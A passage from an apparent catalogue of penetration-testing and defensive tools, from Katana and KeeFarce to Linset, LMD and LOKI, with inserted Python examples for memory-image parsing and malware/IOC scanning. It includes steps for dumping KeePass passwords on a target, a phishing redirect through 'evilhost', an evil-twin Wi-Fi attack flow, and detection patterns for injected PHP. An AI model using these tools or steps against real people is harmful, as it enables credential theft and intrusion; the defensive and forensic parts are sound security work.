Nexus 7 [2012] (Mobile) - nakasig
Nexus 7 [2013] (Wi-Fi) - razor
Nexus 7 [2013] (Mobile) - razorg
Nexus 10 (Tablet) - mantaray
OnePlus One 16 GB - bacon
OnePlus One 64 GB - bacon
Important Concepts

Kali NetHunter runs within a chroot environment on the
Android device so, for example, if you start an SSH server
via an Android application, your SSH connection would
connect to Android and not Kali Linux. This applies to all
network services.
When configuring payloads, the IP address field is the IP
address of the system where you want the shell to return
to. Depending on your scenario, you may want this
address to be something other than the NetHunter.
Due to the fact that the Android device is rooted, Kali
NetHunter has access to all hardware, allowing you to
connect USB devices such as wireless NICs directly to
Kali using an OTG cable.

Download Kali Linux NetHunter

KATANA - FRAMEWORK FOR HACKERS, PROFESSIONAL SECURITY AND DEVELOPERS

Katana is a framework written in Python for penetration testing,
based on a simple and comprehensive structure that anyone can
use, modify and share. The goal is to unify tools that serve
professionals when performing a penetration test, or simply as a
routine tool. The current version is not completely stable, nor
complete.
The project is open to partners.

SOURCE CODE ORGANIZATION

The Katana source code is organized as follows:
-KatanaGUI/ > Source code for graphical user interface
-KatanaLAB/ > Source code for katana laboratory
-core/ > Source code core
--core/db/ > Dictionaries and tables
--core/logs/ > Registers of modules
-files/ > Files necessary for some modules
-tmp/ > Temp files
-lib/ > Libraries
-doc/ > Documentation
-scripts/ > Scripts(modules)

MAIN FILES
--core
Setting.py  --- Setting variables
design.py   --- Design template
Errors.py   --- Error Debug
ping.py     --- Functions
--scripts
__init__.py --- Modules List

REQUIREMENTS
OS requirement:

Kali Linux

INSTALLATION
Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py

USAGE COMMANDS
Stable
  ./sudo ktf.console                              98%   Builded - Enabled
  ./sudo ktf.run -m net/arpspoof                  95%   Builded - Enabled
Building
  ktf.lab                                         30%   Builded - No yet.
  ktf.linker -m web/whois -t google.com -p 80     80%   Builded - No yet.

MODULES (SCRIPTS)
Code Name        Description                        Author        Version
web/httpbt       Brute force to http 403            Redtoor       1.0
web/formbt       Brute force to formbased           Redtoor       1.0
web/cpfinder     Admin panel finder                 Redtoor       1.0
web/joomscan     Scanner vul's cms joomla           Redtoor       1.0
web/dos          Denial of service web              Redtoor       1.0
web/whois        Who-is web                         Redtoor       1.0
net/arpspoof     ARP-Spoofing attack                Redtoor       1.0
net/arplook      ARP-Spoofing detector              cl34r         1.0
net/portscan     Port Scanner                       RedToor       1.0
set/gdreport     Getting information with web       RedToor       3.0
set/mailboom     E-mail bombing SPAM                RedToor       3.0
set/facebrok     facebook phishing platform         RedToor       1.7
fle/brutezip     Brute force to zip files           LeSZO ZerO    1.0
fle/bruterar     Brute force to rar files           LeSZO ZerO    1.0
clt/ftp          Console ftp client                 Redtoor       1.0
clt/sql          Console sql client                 Redtoor       1.0
clt/pop3         Console pop3 client                Redtoor       1.0
clt/ftp          Console ftp client                 Redtoor       1.0
ser/sql          Start SQL server                   Redtoor       1.0
ser/apache       Start Apache server                Redtoor       1.0
ser/ssh          Start SSH server                   Redtoor       1.0
fbt/ftp          Brute force to ftp                 Redtoor       1.0
fbt/ssh          Brute force to ssh                 Redtoor       1.0
fbt/sql          Brute force to sql                 Redtoor       1.0
fbt/pop3         Brute force to pop3                Redtoor       1.0

LINKS
Project in SF : http://sourceforge.net/projects/katanas/files/
Documentation: https://github.com/RedToor/Katana/tree/master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/2015/07/instalacion-y-uso-katana-framework.html

Download Katana
KATOOLIN - AUTOMATICALLY INSTALL ALL KALI LINUX
TOOLS

Automatically install all Kali linux tools

Features

Add Kali linux repositories
Remove Kali linux repositories
Install Kali linux tools

Requirements

Python 2.7
An operating system (tested on Ubuntu)

Installation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin


Usage

Just select the number of a tool to install it
Press 0 to install all tools
back : Go back
gohome : Go to the main menu

Download Katoolin
KEEFARCE - EXTRACTS PASSWORDS FROM A KEEPASS
2.X DATABASE, DIRECTLY FROM MEMORY

KeeFarce allows for the extraction of KeePass 2.x password
database information from memory. The cleartext information,
including usernames, passwords, notes and URLs, is dumped
into a CSV file in %AppData%.
General Design

KeeFarce uses DLL injection to execute code within the context
of a running KeePass process. C# code execution is achieved
by first injecting an architecture-appropriate bootstrap DLL. This
spawns an instance of the .NET runtime within the
appropriate app domain, subsequently executing
KeeFarceDLL.dll (the main C# payload).
The KeeFarceDLL uses CLRMD to find the necessary object in
the KeePass process's heap, locates the pointers to some
required sub-objects (using offsets), and uses reflection to call
an export method.
Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending
on the KeePass target's architecture (32 bit or 64 bit). Archives
and their shasums can be found under the 'prebuilt' directory.
Executing

In order to execute on the target host, the following files need to
be in the same folder:
BootstrapDLL.dll
KeeFarce.exe
KeeFarceDLL.dll
Microsoft.Diagnostic.Runtime.dll
Copy these files across to the target and execute KeeFarce.exe
Building

Open up the KeeFarce.sln with Visual Studio (note: dev was
done on Visual Studio 2015) and hit 'build'. The results will be
spat out into dist/$architecture. You'll have to copy the
KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files
into the folder before executing, as these are architecture
independent.
Compatibility

KeeFarce has been tested on:
KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 both 32 and 64 bit.
This should also work on older Windows machines (win 7 with
a recent service pack). If you're targeting something other than
the above, then testing in a lab environment before hand is
recommended.
Acknowledgements

Sharp Needle by Chad Zawistowski was used for the DLL
injection technique.
Code by Alois Kraus was used to get the pointer to object
C# voodoo working.

Download KeeFarce
KEYBOX - A WEB-BASED SSH CONSOLE THAT
CENTRALLY MANAGES ADMINISTRATIVE ACCESS TO
SYSTEMS

KeyBox is a web-based SSH console that centrally manages
administrative access to systems. Web-based administration is
combined with management and distribution of user's public
SSH keys. Key management and administration is based on
profiles assigned to defined users.
Administrators can login using two-factor authentication with
FreeOTP or Google Authenticator. From there they can
manage their public SSH keys or connect to their systems
through a web-shell. Commands can be shared across shells to
make patching easier and eliminate redundant command
execution.
KeyBox layers TLS/SSL on top of SSH and acts as a bastion
host for administration. Protocols are stacked (TLS/SSL + SSH)
so infrastructure cannot be exposed through tunneling / port
forwarding. More details can be found in the following
whitepaper: The Security Implications of SSH. Also, SSH key
management is enabled by default to prevent unmanaged
public keys and enforce best practices.
Prerequisites

Java JDK 1.7 or greater http://www.oracle.com/technetwork/java/javase/overview/index.html
Browser with Web Socket support http://caniuse.com/websockets
Note: In Safari if using a self-signed certificate you must import the
certificate into your Keychain. Select 'Show Certificate' -> 'Always Trust'
when prompted in Safari
Maven 3 or greater ( Only needed if building from source ) http://maven.apache.org
Install FreeOTP or Google Authenticator to enable two-factor authentication with Android or iOS

To Run Bundled with Jetty

If you're not big on the idea of building from source...
Download keybox-jetty-vXX.XX.tar.gz
https://github.com/skavanagh/KeyBox/releases
Export environment variables
for Linux/Unix/OSX
export JAVA_HOME=/path/to/jdk
export PATH=$JAVA_HOME/bin:$PATH

for Windows
set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%

Start KeyBox
for Linux/Unix/OSX
./startKeyBox.sh

for Windows
startKeyBox.bat

How to Configure SSL in Jetty (it is a good idea to add or
generate your own unique certificate)
http://wiki.eclipse.org/Jetty/Howto/Configure_SSL
Using KeyBox

Open browser to https://<whatever ip>:8443
Login with
username:admin
password:changeme

Steps:
1. Create systems
2. Create profiles
3. Assign systems to profile
4. Assign profiles to users
5. Users can login to create sessions on assigned systems
6. Start a composite SSH session or create and execute a
script across multiple sessions
7. Add additional public keys to systems
8. Disable any administrative public key forcing key rotation.
9. Audit session history

Download KeyBox
KING PHISHER - PHISHING CAMPAIGN TOOLKIT

King Phisher is a tool for testing and promoting user awareness
by simulating real world phishing attacks. It features an easy to
use, yet very flexible architecture allowing full control over both
emails and server content. King Phisher can be used to run
campaigns ranging from simple awareness training to more
complicated scenarios in which user aware content is served
for harvesting credentials.
King Phisher is only to be used for legal applications when the
explicit permission of the targeted organization has been
obtained.

Why Use King Phisher

Fully Featured And Flexible

King Phisher was created out of a need for an application that
would facilitate running multiple separate campaigns with
different goals ranging from education, credential harvesting
and so called "Drive By" attacks. King Phisher has been used
to run campaigns ranging from hundreds of targets to tens of
thousands of targets with ease. It also supports sending
messages with embedded images and determining when
emails are opened with a tracking image.
Integrated Web Server
King Phisher uses the packaged web server that comes
standard with Python making configuring a separate instance
unnecessary.
Open Source
The Python programming language makes it possible to modify
the King Phisher source code to suit the specific needs of the
user. Alternatively end users not interested in modifying the
source code are welcome to open an issue and request a
feature. Users are able to run campaigns as large as they like,
as often as they like.
No Web Interface
No web interface makes it more difficult for prying eyes to
identify that the King Phisher server is being used for social
engineering. Additionally the lack of a web interface reduces
the exposure of the King Phisher operator to web related
vulnerabilities such as XSS.

Download King Phisher
KUNAI - PWNING & INFO GATHERING VIA USER
BROWSER

Sometimes there is a need to obtain the IP address of a specific
person or perform client-side attacks via the user's browser. This is
what you need in such situations.
Kunai is a simple script which collects a lot of information about
a visitor and saves the output to a file; furthermore, you may try to
perform attacks on the user's browser, using BeEF or Metasploit.
In order to grab as much information as possible, the script
detects whether JavaScript is enabled to obtain more details
about a visitor. For example, you can include this script in an
iframe, or perform redirects, to avoid detection of suspicious
activities. The script can notify you via email about users that visit
your script. Whenever someone visits your hook (kunai), the
output file will be updated.
Functions

Stores information about users in elegant output
Website spoofing
Redirects
BeEF & Metasploit compatibility
Email notification
Different reaction for javascript disabled browser
One file composition

Example configs

Website spoofing (more stable & better for autopwn & beef):
Redirect (better for quick ip catching):

goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png

Cross Site Scripting (inclusion)

Download Kunai
LIME - LINUX MEMORY EXTRACTOR

A Loadable Kernel Module (LKM) which allows for volatile
memory acquisition from Linux and Linux-based devices, such
as Android. This makes LiME unique as it is the first tool that
allows for full memory captures on Android devices. It also
minimizes its interaction between user and kernel space
processes during acquisition, which allows it to produce
memory captures that are more forensically sound than those
of other tools designed for Linux memory acquisition.
Features

Full Android memory acquisition
Acquisition over network interface
Minimal process footprint

Usage

Detailed documentation on LiME's usage and internals can be
found in the "doc" directory of the project.
LiME utilizes the insmod command to load the module, passing
required arguments for its execution.
insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"

path (required):
  outfile ~ name of file to write to on local system (SD Card)
  tcp:port ~ network port to communicate over
format (required):
  raw ~ concatenates all System RAM ranges
  padded ~ pads all non-System RAM ranges with 0s
  lime ~ each range prepended with fixed-size header containing address space info
dio (optional):
  1 ~ attempt to enable Direct IO
  0 ~ default, do not attempt Direct IO
localhostonly (optional):
  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples

In this example we use adb to load LiME and then start it with
acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now on the host machine, we can establish the connection and
acquire memory using netcat
$ nc localhost 4444 > ram.lime

Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime
format=lime"
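The three output formats above differ only in how the System RAM ranges are laid out. The following added example (not part of the LiME project) parses a "lime" format image and converts it to the equivalent of the "raw" and "padded" layouts, which is what you do when an analysis tool expects a flat physical image. The per-range header layout it assumes is the one from lime.h (32 bytes: magic 0x4C694D45 "LiME", version 1, 64-bit start and inclusive end physical address, 8 reserved bytes, little-endian); the two-range image it operates on is constructed in memory, and the assumption that a padded image starts at physical address 0 is the example's own.

```python
"""Parse and convert LiME 'lime' format memory images. Added example; not
LiME's code. Header layout per lime.h; sample image constructed below."""
import struct
from typing import List, Tuple

LIME_MAGIC = 0x4C694D45            # "LiME" read as a little-endian 32-bit int
LIME_VERSION = 1
HEADER = struct.Struct("<IIQQ8s")  # magic, version, s_addr, e_addr, reserved

Range = Tuple[int, int, bytes]     # (start address, inclusive end address, data)


def build_lime(ranges: List[Tuple[int, bytes]]) -> bytes:
    """Write (start, data) pairs as a LiME image; used to construct test input."""
    out = bytearray()
    for start, data in ranges:
        end = start + len(data) - 1   # e_addr is inclusive
        out += HEADER.pack(LIME_MAGIC, LIME_VERSION, start, end, b"\0" * 8)
        out += data
    return bytes(out)


def parse_lime(image: bytes) -> List[Range]:
    """Walk the image header by header. Anything that is not LiME v1, or that is
    truncated, raises instead of silently yielding garbage from a corrupt capture."""
    ranges: List[Range] = []
    pos = 0
    while pos < len(image):
        if len(image) - pos < HEADER.size:
            raise ValueError(f"truncated header at offset {pos}")
        magic, version, s_addr, e_addr, _ = HEADER.unpack_from(image, pos)
        if magic != LIME_MAGIC:
            raise ValueError(f"bad magic 0x{magic:08x} at offset {pos}")
        if version != LIME_VERSION:
            raise ValueError(f"unsupported LiME version {version}")
        if e_addr < s_addr:
            raise ValueError(f"range end 0x{e_addr:x} before start 0x{s_addr:x}")
        pos += HEADER.size
        size = e_addr - s_addr + 1
        if len(image) - pos < size:
            raise ValueError(f"truncated range data at offset {pos}")
        ranges.append((s_addr, e_addr, image[pos:pos + size]))
        pos += size
    return ranges


def is_valid_lime(image: bytes) -> bool:
    """True when the whole image parses as LiME v1 without truncation."""
    try:
        parse_lime(image)
        return True
    except ValueError:
        return False


def lime_to_raw(image: bytes) -> bytes:
    """'raw' equivalent: concatenate the System RAM ranges, dropping the addresses."""
    return b"".join(data for _, _, data in parse_lime(image))


def lime_to_padded(image: bytes) -> bytes:
    """'padded' equivalent: zero-fill the gaps so that file offset == physical
    address. Assumption (this example's): padding starts at address 0."""
    out = bytearray()
    for s_addr, _, data in parse_lime(image):
        if s_addr < len(out):
            raise ValueError("overlapping or unordered ranges")
        out += b"\0" * (s_addr - len(out))
        out += data
    return bytes(out)


def describe(image: bytes) -> List[str]:
    """One line per range, the sanity check worth doing before analysis."""
    return [f"0x{s:016x}-0x{e:016x} ({len(d)} bytes)" for s, e, d in parse_lime(image)]


if __name__ == "__main__":
    # Constructed two-range sample, not a real capture.
    sample = build_lime([(0x1000, b"A" * 16), (0x3000, b"B" * 8)])
    print("\n".join(describe(sample)))
    print("raw:", len(lime_to_raw(sample)), "bytes; padded:",
          len(lime_to_padded(sample)), "bytes")
```

The range listing is the first thing to check on a capture taken over tcp: a listener that disconnected early leaves a truncated last range, which parse_lime reports rather than analysing partial data as if it were complete.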

Download Lime
LINSET - WPA/WPA2 HACK WITHOUT BRUTE FORCE

How it works

Scan the networks.
Select network.
Capture handshake (can be used without handshake)
We choose one of several web interfaces tailored for me
(thanks to the collaboration of the users)
Mounts one FakeAP imitating the original
A DHCP server is created on FakeAP
It creates a DNS server to redirect all requests to the Host
The web server with the selected interface is launched
The mechanism is launched to check the validity of the
passwords that will be introduced
It deauthenticates all users of the network, hoping they
connect to FakeAP and enter the password.
The attack will stop once the correct password has been checked
It is necessary to have the dependencies installed; Linset
checks and indicates whether they are installed or not.
It is also preferable that you keep the patch for the
negative channel, because if not, you will have complications
carrying out the attack correctly.
How to use
$ chmod +x linset
$ ./linset

Download LINSET
LMD - LINUX MALWARE DETECT
Linux Malware Detect (LMD) is a malware scanner for Linux
released under the GNU GPLv2 license, that is designed
around the threats faced in shared hosted environments. It
uses threat data from network edge intrusion detection systems
to extract malware that is actively being used in attacks and
generates signatures for detection. In addition, threat data is
also derived from user submissions with the LMD checkout
feature and from malware community resources. The
signatures that LMD uses are MD5 file hashes and HEX pattern
matches, they are also easily exported to any number of
detection tools such as ClamAV.
The driving force behind LMD is that there is currently limited
availability of open source/restriction free tools for Linux
systems that focus on malware detection and more important
that get it right. Many of the AV products that perform malware
detection on Linux have a very poor track record of detecting
threats, especially those targeted at shared hosted
environments.
The threat landscape in shared hosted environments is unique
from that of the standard AV products detection suite in that
they are detecting primarily OS level trojans, rootkits and
traditional file-infecting viruses but missing the ever increasing
variety of malware on the user account level which serves as
an attack platform.
The commercial products available for malware detection and
remediation in multi-user shared environments remains
abysmal. An analysis of 8,883 malware hashes, detected by
LMD 1.5, against 30 commercial anti-virus and malware
products paints a picture of how poorly commercial solutions
perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931

Using the Team Cymru malware hash registry, we can see that
of the 8,883 malware hashes shipping with LMD 1.5, there was
6,931 or 78% of threats that went undetected by 30 commercial
anti-virus and malware products. The 1,951 threats that were
detected had an average detection rate of 58% with a low and
high detection rate of 10% and 100% respectively. There could
not be a clearer statement to the need for an open and
community driven malware remediation project that focuses on
the threat landscape of multi-user shared environments.
Features:

MD5 file hash detection for quick threat identification
HEX based pattern matching for identifying threat variants
statistical analysis component for detection of obfuscated
threats (e.g: base64)
integrated detection of ClamAV to use as scanner engine
for improved performance
integrated signature update feature with -u|update
integrated version update feature with -d|update-ver
scan-recent option to scan only files that have been
added/changed in X days
scan-all option for full path based scanning
checkout option to upload suspected malware to rfxn.com
for review / hashing
full reporting system to view current and previous scan
results
quarantine queue that stores threats in a safe fashion with
no permissions
quarantine batching option to quarantine the results of a
current or past scans
quarantine restore option to restore files to original path,
owner and perms
quarantine suspend account option to Cpanel suspend or
shell revoke users
cleaner rules to attempt removal of malware injected
strings
cleaner batching option to attempt cleaning of previous
scan reports
cleaner rules to remove base64 and gzinflate(base64
injected malware
daily cron based scanning of all changes in last 24h in
user homedirs
daily cron script compatible with stock RH style systems,
Cpanel & Ensim
kernel based inotify real time file scanning of created/
modified/moved files
kernel inotify monitor that can take path data from STDIN
or FILE
kernel inotify monitor convenience feature to monitor
system users
kernel inotify monitor can be restricted to a configurable
user html root
kernel inotify monitor with dynamic sysctl limits for optimal
performance
kernel inotify alerting through daily and/or optional weekly
reports
e-mail alert reporting after every scan execution (manual
& daily)
path, extension and signature based ignore options
background scanner option for unattended scan
operations
verbose logging & output of all actions
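Three items in the feature list above work together against injected PHP: HEX pattern matching, the statistical base64 heuristic, and the cleaner rules that target base64 and gzinflate(base64 wrappers. The following is an added example, not LMD's code or signature format, that shows the mechanism: hex-encoded byte patterns are matched against the file, any gzinflate(base64_decode('...')) or base64_decode('...') construct is decoded (gzinflate is raw DEFLATE, which zlib reads with wbits=-15) and the decoded layer is scanned again, and the fraction of the file covered by long base64 runs serves as the statistical indicator for payloads no pattern knows yet. The signature names, the sample files and the density threshold are constructed.

```python
"""Hex-pattern scanning with base64 / gzinflate(base64) layer decoding and a
base64-density heuristic, in the style of LMD's HEX signatures and cleaner
rules. Added example; not LMD code. Signatures and samples are constructed."""
import base64
import binascii
import re
import zlib
from typing import Dict, List, Tuple

# Constructed signatures: name -> hex-encoded byte pattern (hex lets a
# signature carry non-printable bytes, as LMD's HEX signatures do).
HEX_SIGS: Dict[str, str] = {
    "php.inject.gzbase64.wrapper": binascii.hexlify(b"gzinflate(base64_decode(").decode(),
    "php.inject.base64.wrapper": binascii.hexlify(b"eval(base64_decode(").decode(),
    "test.marker.constructed": binascii.hexlify(b"CONSTRUCTED_INJECTED_MARKER").decode(),
}

GZ_B64 = re.compile(rb"gzinflate\(base64_decode\(['\"]([A-Za-z0-9+/=]+)['\"]\)\)")
B64_CALL = re.compile(rb"base64_decode\(['\"]([A-Za-z0-9+/=]+)['\"]\)")
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}")


def match_hex_sigs(data: bytes, sigs: Dict[str, str] = HEX_SIGS) -> List[str]:
    """Names of every hex pattern whose decoded bytes occur in data."""
    return [name for name, hx in sigs.items() if binascii.unhexlify(hx) in data]


def decode_layers(data: bytes) -> List[bytes]:
    """Unwrap gzinflate(base64_decode('...')) and plain base64_decode('...')
    constructs; undecodable blobs are skipped rather than aborting the scan."""
    found: List[bytes] = []
    for m in GZ_B64.finditer(data):
        try:
            found.append(zlib.decompress(base64.b64decode(m.group(1)), -15))
        except (binascii.Error, zlib.error, ValueError):
            continue
    rest = GZ_B64.sub(b"", data)   # do not re-decode the wrapped blobs as plain base64
    for m in B64_CALL.finditer(rest):
        try:
            found.append(base64.b64decode(m.group(1), validate=True))
        except (binascii.Error, ValueError):
            continue
    return found


def base64_density(data: bytes) -> float:
    """Fraction of the file covered by base64 runs of 200+ chars: the statistical
    indicator for obfuscated payloads that match no known pattern."""
    if not data:
        return 0.0
    covered = sum(len(m.group(0)) for m in B64_RUN.finditer(data))
    return covered / len(data)


def scan(data: bytes, max_depth: int = 3) -> List[Tuple[str, int]]:
    """Scan data and every decoded layer beneath it; returns (signature, layer)."""
    hits: List[Tuple[str, int]] = []
    frontier = [(data, 0)]
    while frontier:
        blob, depth = frontier.pop()
        hits.extend((name, depth) for name in match_hex_sigs(blob))
        if depth < max_depth:
            frontier.extend((inner, depth + 1) for inner in decode_layers(blob))
    return hits


def is_suspicious(data: bytes, density_threshold: float = 0.5) -> bool:
    return bool(scan(data)) or base64_density(data) > density_threshold


# Constructed sample files (not real malware): a page with an injected
# gzinflate(base64) block, one with a plain base64 block, and a dense blob.
def make_injected_sample() -> bytes:
    inner = b"<?php /* constructed */ echo 'CONSTRUCTED_INJECTED_MARKER'; ?>"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE == gzinflate input
    b64 = base64.b64encode(comp.compress(inner) + comp.flush())
    return (b"<html><body>welcome</body></html>\n<?php eval(gzinflate(base64_decode('"
            + b64 + b"'))); ?>\n")


def make_base64_sample() -> bytes:
    b64 = base64.b64encode(b"<?php echo 'CONSTRUCTED_INJECTED_MARKER'; ?>")
    return b"<?php eval(base64_decode('" + b64 + b"')); ?>\n"


def make_dense_sample() -> bytes:
    return b"<?php $blob = '" + base64.b64encode(bytes(range(256)) * 3) + b"'; ?>\n"


if __name__ == "__main__":
    for label, blob in (("injected", make_injected_sample()), ("dense", make_dense_sample())):
        print(label, scan(blob), f"density={base64_density(blob):.2f}",
              "suspicious" if is_suspicious(blob) else "clean")
```

The layer index in each hit is what a cleaner rule needs: a hit at layer 1 means the on-disk bytes are the wrapper, and the decoded content is what must be removed or quarantined.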

Source Data:

The defining difference with LMD is that it doesn't just detect
malware based on signatures/hashes that someone else
generated but rather it is an encompassing project that actively
tracks in the wild threats and generates signatures based on
those real world threats that are currently circulating.
There are four main sources for malware data that is used to
generate LMD signatures:
Network Edge IPS: Through networks managed as part of my
day-to-day job, primarily web hosting related, our web servers
receive a large amount of daily abuse events, all of which is
logged by our network edge IPS. The IPS events are
processed to extract malware urls, decode POST payload and
base64/gzip encoded abuse data and ultimately that malware is
retrieved, reviewed, classified and then signatures generated
as appropriate. The vast majority of LMD signatures have been
derived from IPS extracted data.
Community Data: Data is aggregated from multiple
community malware websites such as clean-mx and
malwaredomainlist then processed to retrieve new malware,
review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV
are monitored for relevant updates that apply to the target user
group of LMD and added to the project as appropriate. To date
there has been roughly 400 signatures ported from ClamAV
while the LMD project has contributed back to ClamAV by
submitting over 1,100 signatures and continues to do so on an
ongoing basis.
User Submission: LMD has a checkout feature that allows
users to submit suspected malware for review, this has grown
into a very popular feature and generates on average about
30-50 submissions per week.
Signature Updates:

The LMD signature are updated typically once per day or more
frequently depending on incoming threat data from the LMD
checkout feature, IPS malware extraction and other sources.
The updating of signatures in LMD installations is performed
daily through the default cron.daily script with the update
option, which can be run manually at any time.
An RSS feed is available for tracking malware threat updates:
http://www.rfxn.com/api/lmd
Detected Threats:

LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914) signatures,
before any updates. The top 60 threats by prevalence detected
by LMD are as follows:
base64.inject.unclassed         perl.ircbot.xscan
bin.dccserv.irsexxy             perl.mailer.yellsoft
bin.fakeproc.Xnuxer             perl.shell.cbLorD
bin.ircbot.nbot                 perl.shell.cgitelnet
bin.ircbot.php3                 php.cmdshell.c100
bin.ircbot.unclassed            php.cmdshell.c99
bin.pktflood.ABC123             php.cmdshell.cih
bin.pktflood.osf                php.cmdshell.egyspider
bin.trojan.linuxsmalli          php.cmdshell.fx29
c.ircbot.tsunami                php.cmdshell.ItsmYarD
exp.linux.rstb                  php.cmdshell.Ketemu
exp.linux.unclassed             php.cmdshell.N3tshell
exp.setuid0.unclassed           php.cmdshell.r57
gzbase64.inject                 php.cmdshell.unclassed
html.phishing.auc61             php.defash.buno
html.phishing.hsbc              php.exe.globals
perl.connback.DataCha0s         php.include.remote
perl.connback.N2                php.ircbot.InsideTeam
perl.cpanel.cpwrap              php.ircbot.lolwut
perl.ircbot.atrixteam           php.ircbot.sniper
perl.ircbot.bRuNo               php.ircbot.vj_denie
perl.ircbot.Clx                 php.mailer.10hack
perl.ircbot.devil               php.mailer.bombam
perl.ircbot.fx29                php.mailer.PostMan
perl.ircbot.magnum              php.phishing.AliKay
perl.ircbot.oldwolf             php.phishing.mrbrain
perl.ircbot.putr4XtReme         php.phishing.ReZulT
perl.ircbot.rafflesia           php.pktflood.oey
perl.ircbot.UberCracker         php.shell.rc99
perl.ircbot.xdh                 php.shell.shellcomm

Real-Time Monitoring:

The inotify monitoring feature is designed to monitor paths/
users in real-time for file creation/modify/move operations. This
option requires a kernel that supports inotify_watch
(CONFIG_INOTIFY) which is found in kernels 2.6.13+ and
CentOS/RHEL 5 by default. If you are running CentOS 4 you
should consider an inbox upgrade with:
http://www.rfxn.com/upgrade-centos-4-8-to-5-3/
There are three modes that the monitor can be executed with
and they relate to what will be monitored, they are USERS|
PATHS|FILES.
e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option will take the homedirs of all system
users that are above inotify_minuid and monitor them. If
inotify_webdir is set then the users webdir, if it exists, will only
be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor
Once you start maldet in monitor mode, it will preprocess the
paths based on the option specified followed by starting the
inotify process. The starting of the inotify process can be a time
consuming task as it needs to setup a monitor hook for every
file under the monitored paths. Although the startup process
can impact the load temporarily, once the process has started it
maintains all of its resources inside kernel memory and has a
very small userspace footprint in memory or cpu usage.

Download LMD
LOKI - SCANNER FOR SIMPLE INDICATORS OF
COMPROMISE

Simple IOC Scanner

Detection is based on four detection methods:
1. File Name IOC
Regex match on full file path/name
2. Yara Rule Check
Yara signature match on file data and process memory
3. Hash check
Compares known malicious hashes (MD5, SHA1, SHA256)
with scanned files

The Windows binary is compiled with PyInstaller 2.1 and should
run as x86 application on both x86 and x64 based systems.
Run

Download the program archive via the button "Download
ZIP" on the right sidebar
Unpack LOKI locally
Provide the folder to a target system that should be
scanned: removable media, network share, folder on
target system
Right-click on loki.exe and select "Run as Administrator"
or open a command line "cmd.exe" as Administrator and
run it from there (you can also run LOKI without
administrative privileges but some checks will be disabled
and relevant objects on disk will not be accessible)

Reports

The resulting report will show a GREEN, YELLOW or RED
result line.
Please analyse the findings yourself by:
1. uploading non-confidential samples to Virustotal.com
2. Search the web for the filename
3. Search the web for keywords from the rule name
(e.g. EQUATIONGroupMalware_1 > search for
"Equation Group")
4. Search the web for the MD5 hash of the sample
Please report back false positives via the "Issues" section,
which is accessible via the right sidebar (mention the false
positive indicator like a hash and/or filename and the rule
name that triggered)
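To make the detection methods and the report concrete, here is an added example, not LOKI's own code or IOC files: a scanner that applies the File Name IOC method (regex on the full path) and the Hash check method (MD5, SHA1 and SHA256 of each file against one mixed hash list), skips files above a size limit the way LOKI's -s option does, and turns the accumulated score into the GREEN / YELLOW / RED result line the Reports section describes. The IOC entries, the scores and thresholds, and the sample directory tree it builds are constructed; the hash IOCs are the hashes of two constructed files so the match path can be exercised offline.

```python
"""File-name regex IOCs plus MD5/SHA1/SHA256 hash IOCs with a size limit and
a GREEN/YELLOW/RED verdict, in LOKI's style. Added example; not LOKI code.
IOC lists, scores and the sample tree are constructed."""
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Constructed file-name IOCs: (regex over the full path, description, score).
FILENAME_IOCS: List[Tuple[str, str, int]] = [
    (r"(?i)[\\/]te?mp[\\/][a-z]{8}\.exe$", "random-named executable in a temp directory", 40),
    (r"(?i)(^|[\\/])constructed_dropper\.exe$", "constructed tool-name IOC", 80),
]

# Constructed sample contents whose hashes act as the hash IOCs (any algorithm
# may appear in the list; every file is checked with all three).
SAMPLE_A = b"CONSTRUCTED malicious sample A\n"
SAMPLE_B = b"CONSTRUCTED malicious sample B\n"
HASH_IOCS: Dict[str, str] = {
    hashlib.md5(SAMPLE_A).hexdigest(): "constructed md5 IOC for sample A",
    hashlib.sha256(SAMPLE_B).hexdigest(): "constructed sha256 IOC for sample B",
}


def file_hashes(path: str) -> Dict[str, str]:
    """MD5, SHA1 and SHA256 of a file, read in chunks so large files do not load whole."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            for h in (md5, sha1, sha256):
                h.update(chunk)
    return {"md5": md5.hexdigest(), "sha1": sha1.hexdigest(), "sha256": sha256.hexdigest()}


def score_file(path: str) -> Tuple[int, List[str]]:
    """Accumulate points from every IOC that matches; reasons feed the report line."""
    score, reasons = 0, []
    for pattern, desc, points in FILENAME_IOCS:
        if re.search(pattern, path):
            score += points
            reasons.append(f"filename IOC: {desc}")
    for algo, digest in file_hashes(path).items():
        if digest in HASH_IOCS:
            score += 100
            reasons.append(f"{algo} hash IOC: {HASH_IOCS[digest]}")
    return score, reasons


def verdict(score: int) -> str:
    """Constructed thresholds: 80+ RED, 40+ YELLOW, otherwise GREEN."""
    return "RED" if score >= 80 else "YELLOW" if score >= 40 else "GREEN"


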